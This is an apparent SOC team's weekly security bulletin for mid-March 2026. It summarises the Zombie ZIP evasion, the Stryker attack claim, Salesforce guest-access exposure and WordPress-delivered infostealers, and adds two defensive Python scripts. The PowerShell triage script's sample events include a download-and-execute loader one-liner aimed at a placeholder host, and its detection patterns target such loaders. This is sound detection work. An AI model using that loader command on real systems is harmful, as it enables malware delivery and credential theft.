Cybersecurity Weekly Update: 9-16 March 2026
- SOC Team

1. “Zombie ZIP” Technique Allows Malware to Bypass Antivirus
Researchers have discovered a technique called “Zombie ZIP” (CVE-2026-0866) that allows malicious ZIP archives to evade detection by many antivirus tools. The attack works by manipulating archive metadata so security software incorrectly interprets the contents and fails to scan the compressed files inside. When opened with a specially crafted extraction process, the hidden payload can be reconstructed and executed, potentially allowing attackers to deliver malware through email attachments or downloads without being detected by traditional security tools. (tomshardware.com)
Why it matters: Malware that bypasses antivirus scanning significantly increases the risk of successful phishing campaigns.
Action: Use sandboxing, endpoint detection tools, and treat unexpected ZIP attachments as suspicious.
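As an added defensive illustration (not code from the article or from the researchers it cites), the following Python check reads a ZIP two ways: it walks the local file headers forward from offset 0, the view a streaming scanner gets, and compares that with the central directory at the end of the file, the view that `zipfile` and most tools trust. Any disagreement between the two is reported. It does not reproduce the specific CVE-2026-0866 trick, which the article does not detail; the sample archives are constructed inline, and the inconsistent one is a deliberately built test fixture.

```python
import io
import struct
import zipfile

LOCAL_SIG = b"PK\x03\x04"
# Fixed 30-byte local file header: sig, version, flags, method, time, date,
# crc32, compressed size, uncompressed size, name length, extra length.
LOCAL_HEADER = struct.Struct("<4sHHHHHIIIHH")
FLAG_DATA_DESCRIPTOR = 0x0008


def walk_local_headers(data: bytes) -> list:
    """Entry names found by walking local file headers forward from offset 0."""
    names = []
    off = 0
    while off + LOCAL_HEADER.size <= len(data) and data[off:off + 4] == LOCAL_SIG:
        fields = LOCAL_HEADER.unpack_from(data, off)
        flags, csize, nlen, xlen = fields[2], fields[7], fields[9], fields[10]
        name_start = off + LOCAL_HEADER.size
        names.append(data[name_start:name_start + nlen].decode("utf-8", "replace"))
        if flags & FLAG_DATA_DESCRIPTOR:
            # Sizes live in a trailing data descriptor; stop rather than guess.
            break
        off = name_start + nlen + xlen + csize
    return names


def check_archive(data: bytes) -> dict:
    """Compare the local-header walk with the central directory and report issues."""
    issues = []
    local_names = walk_local_headers(data)
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        central = zf.infolist()
    central_names = [info.filename for info in central]
    for info in central:
        off = info.header_offset
        if data[off:off + 4] != LOCAL_SIG:
            issues.append(f"central entry {info.filename!r} does not point at a local header")
            continue
        nlen = LOCAL_HEADER.unpack_from(data, off)[9]
        local_name = data[off + LOCAL_HEADER.size:off + LOCAL_HEADER.size + nlen]
        if local_name != info.filename.encode("utf-8"):  # ASCII names assumed
            issues.append(f"name mismatch at offset {off}: central {info.filename!r}, local {local_name!r}")
    local_only = sorted(set(local_names) - set(central_names))
    central_only = sorted(set(central_names) - set(local_names))
    if local_only:
        issues.append(f"local headers not listed in the central directory: {local_only}")
    if central_only:
        issues.append(f"central entries not reached by walking local headers: {central_only}")
    return {"local": local_names, "central": central_names,
            "issues": issues, "consistent": not issues}


def build_zip(files: dict) -> bytes:
    """Constructed sample archive (test data for this example only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in files.items():
            zf.writestr(name, content)
    return buf.getvalue()


if __name__ == "__main__":
    clean = build_zip({"report.txt": b"quarterly numbers", "notes/readme.md": b"# notes"})
    # Deliberately inconsistent fixture: a second archive appended after the first,
    # so the trailing central directory no longer describes the leading local headers.
    fixture = build_zip({"a.txt": b"A"}) + build_zip({"b.txt": b"B"})
    for label, blob in (("clean", clean), ("fixture", fixture)):
        print(label, check_archive(blob))
```

Run it over inbound attachments before they reach a user; an archive whose two views disagree is a good candidate for sandbox detonation rather than a plain antivirus scan.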
2. Iranian-Linked Hackers Claim Cyberattack on Medical Technology Company
An Iranian-linked hacking group known as Handala has claimed responsibility for a cyberattack targeting medical technology manufacturer Stryker, reportedly disrupting some internal systems. The attackers displayed messages on employee login screens and claimed the attack was politically motivated. Although investigations are ongoing, the incident highlights how healthcare technology companies are increasingly targeted due to the critical systems and sensitive data they manage. (reuters.com)
Why it matters: Disruption of internal systems at medical technology providers can cause hospital devices or software to go offline, delaying clinical operations and affecting patient care.
Action: Strengthen network segmentation and review third-party security risks.
3. Salesforce Experience Cloud Misconfiguration Leads to Data Exposure Claims
Salesforce issued a customer alert after the hacking group ShinyHunters claimed to have exploited misconfigured Salesforce Experience Cloud environments to extract data from public-facing sites. The attacker used a modified version of an open-source scanning tool to identify overly permissive guest user access settings, allowing them to harvest CRM data without needing valid credentials. Salesforce emphasised this was due to configuration issues rather than a platform vulnerability, and advised customers to audit guest user permissions and monitor logs for unusual activity. (itpro.com)
Why it matters: Misconfigurations in widely used enterprise platforms can expose sensitive business data to attackers without exploiting a software vulnerability.
Action: Review configuration and access controls for SaaS platforms like Salesforce Experience Cloud, disable unnecessary guest access, and strengthen monitoring of API and event logs.
4. Global Infostealer Operation Linked to Compromised WordPress Websites
Security researchers from Rapid7 reported that attackers are exploiting compromised WordPress websites to deliver multiple information-stealing malware families, including Vidar, Impure Stealer, and VodkaStealer. The infection chain typically begins when a user visits a compromised site and encounters a fake CAPTCHA prompt that instructs them to run a command. Executing that command launches a PowerShell script that downloads the malware payload directly into memory. Because the attack leverages legitimate websites and multi-stage loaders, it can evade many traditional security controls. (rapid7.com)
Why it matters: Infostealer malware is commonly used to steal corporate credentials, which are later sold on criminal marketplaces or used for ransomware attacks.
Action: Deploy endpoint detection and response (EDR) tools and monitor systems for suspicious PowerShell activity.
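The following triage script is an added example, not Rapid7's detection logic or code from the article. It scores PowerShell script-block log text (the shape of Windows Event ID 4104 `ScriptBlockText`) against indicators typical of the in-memory download-and-execute loader described above, decoding any `-EncodedCommand` payload before scoring so that encoding does not hide the indicators. The indicator list, the weights and the sample events are assumptions made for illustration; the sample events are constructed and use a non-routable `example.invalid` host.

```python
import base64
import re

# Indicator patterns for PowerShell script-block text. Constructed for this
# example, not a vendor rule set; tune against your own baseline before use.
INDICATORS = {
    "in_memory_exec": re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I),
    "web_download": re.compile(
        r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|Invoke-RestMethod", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
}
# -e / -enc / -EncodedCommand followed by a base64 blob (a UTF-16LE script).
ENCODED_COMMAND = re.compile(
    r"-e(?:nc|ncodedcommand)?\b\s+(?P<b64>[A-Za-z0-9+/=]{20,})", re.I)


def decode_encoded_command(text: str):
    """Return the decoded -EncodedCommand script, or None if there is none."""
    match = ENCODED_COMMAND.search(text)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group("b64"), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    return raw.decode("utf-16le", errors="replace")


def score_script_block(text: str) -> dict:
    """Score one script block; a decoded -EncodedCommand payload is scanned too."""
    hits = {name for name, pat in INDICATORS.items() if pat.search(text)}
    decoded = decode_encoded_command(text)
    if decoded is not None:
        hits.add("encoded_command")
        hits |= {name for name, pat in INDICATORS.items() if pat.search(decoded)}
    score = len(hits)
    # Execute-from-memory together with a fetch or decode step is the loader
    # shape described in the article, so it outweighs any single indicator.
    if "in_memory_exec" in hits and hits & {"web_download", "base64_decode"}:
        score += 2
    level = "high" if score >= 3 else "review" if score >= 1 else "benign"
    return {"level": level, "score": score, "indicators": sorted(hits), "decoded": decoded}


def triage(events):
    """events: iterable of (record_id, script_block_text) pairs."""
    return [dict(record_id=rid, **score_script_block(text)) for rid, text in events]


def _utf16_b64(script: str) -> str:
    # Helper used only to build the constructed sample below.
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample events shaped like Event ID 4104 ScriptBlockText values.
SAMPLE_EVENTS = [
    (1, "Get-Service | Where-Object { $_.Status -eq 'Running' }"),
    (2, "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
        ".DownloadString('http://example.invalid/p')\""),
    (3, r"powershell -ExecutionPolicy Bypass -File C:\scripts\nightly-backup.ps1"),
    (4, r"Invoke-WebRequest -Uri https://intranet.example/report.csv -OutFile C:\Reports\report.csv"),
    (5, "$s = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($b)); iex $s"),
    (6, "powershell -NoP -EncodedCommand " + _utf16_b64(
        "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')")),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding["record_id"], finding["level"], finding["score"], finding["indicators"])
```

Script-block logging must be enabled on the endpoints for there to be anything to score; the "review" tier exists so that a lone `Invoke-WebRequest` from an administrator's script is queued for a look rather than paged as an incident.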
Key Recommendations
- Deploy sandboxing and advanced endpoint/email security to catch malicious attachments.
- Audit SaaS platform configurations and restrict unnecessary guest/API access.
- Segment networks and enforce least-privilege access for critical systems.
- Monitor website integrity and patch CMS/software dependencies promptly.
- Train users to recognise phishing, malicious prompts, and suspicious activity.
- Enable rapid detection with EDR, SIEM, and log monitoring tools.

